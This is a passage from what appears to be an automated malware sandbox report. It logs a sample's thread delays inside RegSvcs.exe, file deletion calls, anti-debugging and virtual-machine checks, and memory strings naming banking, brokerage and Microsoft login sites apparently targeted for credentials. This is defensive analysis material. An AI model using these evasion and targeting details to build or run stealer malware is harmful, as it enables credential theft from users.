                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593860
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2541
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7992
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe API coverage: 4.0 %
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe API coverage: 4.2 %
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose 0_2_0057DBBE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_0054C2A2 FindFirstFileExW 0_2_0054C2A2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_005868EE FindFirstFileW,FindClose 0_2_005868EE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime 0_2_0058698F
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose 0_2_0057D076
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose 0_2_0057D3A9
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose 0_2_00589642
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose 0_2_0058979D
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose 0_2_00589B2B
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exe Code function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose 0_2_00585C97
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00A9DBBE
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A6C2A2 FindFirstFileExW,2_2_00A6C2A2
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA68EE FindFirstFileW,FindClose,2_2_00AA68EE
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00AA698F
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00A9D076
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00A9D3A9
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AA9642
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AA979D
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00AA9B2B
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00AA5C97
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598904Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597663Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595135Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594151Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594028Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599568Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599434Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599315Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                  Source: RegSvcs.exe, 00000003.00000002.3792050147.0000000001457000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3792119785.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                  Source: wscript.exe, 00000005.00000002.1522777594.0000018A9AF18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C79548 LdrInitializeThunk,7_2_06C79548
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058EAA2 BlockInput,0_2_0058EAA2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00542622
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00534CE8 mov eax, dword ptr fs:[00000030h]0_2_00534CE8
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_017206C0 mov eax, dword ptr fs:[00000030h]0_2_017206C0
